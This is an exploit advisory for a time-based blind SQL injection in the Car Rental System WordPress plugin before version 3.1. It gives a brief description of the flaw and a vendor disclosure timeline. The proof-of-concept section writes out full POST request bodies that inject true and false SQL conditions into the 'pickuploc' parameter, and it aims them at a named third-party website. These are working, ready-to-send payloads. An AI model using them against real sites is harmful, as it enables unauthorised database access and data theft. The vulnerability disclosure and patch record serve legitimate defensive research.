id: 24144
date: 08/26/2015
title: WordPress Car Rental System SQL Injection Vulnerability
author: Manish Tanwar
cves: 

##################################################################################################
#Exploit Title : Car Rental System (Native WordPress Plugin) SQL Injection vulnerability < version3.1
#Author        : Manish Kishan Tanwar AKA error1046
#Vendor Link   : http://codecanyon.net/item/car-rental-system-native-wordpress-plugin/11758680
# Affected Version: below version 3.1
#Date          : 12/07/2015
#Love to       : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi
#Discovered At : Indishell Lab
##################################################################################################

////////////////////////
/// Overview:
////////////////////////

Car Rental System wordpress plugin is a plugin which provide to book car on a specific date with specific location.
There was post parameters(pickuploc and dropoff) which was not checking user supplied data properly before passing it to SQL Query
and hence plugin was allowing Time based blind SQL Injection attack.

Reported to vendor:-
June 18, 2015
Vendor replied:-
June 19,2015

Vendor released a patch:-
june 21,2015(version 3.1)

 

////////////////
///  POC   ////
///////////////

Payload with true SQL Query 
http://cars.matuliauskas.com/en/

POST data
crs_came_from_step1=yes&transport_type=car&car_type=0&car_transmission=0&pickuploc=2 and 2=2--&pickup=2015-07-22&pickUpTime=09%3A00%3A00&dropoffloc=3&dropoff=2015-08-20&dropoffTime=09%3A00%3A00&btn_room_search=Search%2BAll%2BCars

Payload with false SQL Query
http://cars.matuliauskas.com/en/

POST data
crs_came_from_step1=yes&transport_type=car&car_type=0&car_transmission=0&pickuploc=2 and 2=5--&pickup=2015-07-22&pickUpTime=09%3A00%3A00&dropoffloc=3&dropoff=2015-08-20&dropoffTime=09%3A00%3A00&btn_room_search=Search%2BAll%2BCars

#  0day.today [2023-03-22]  #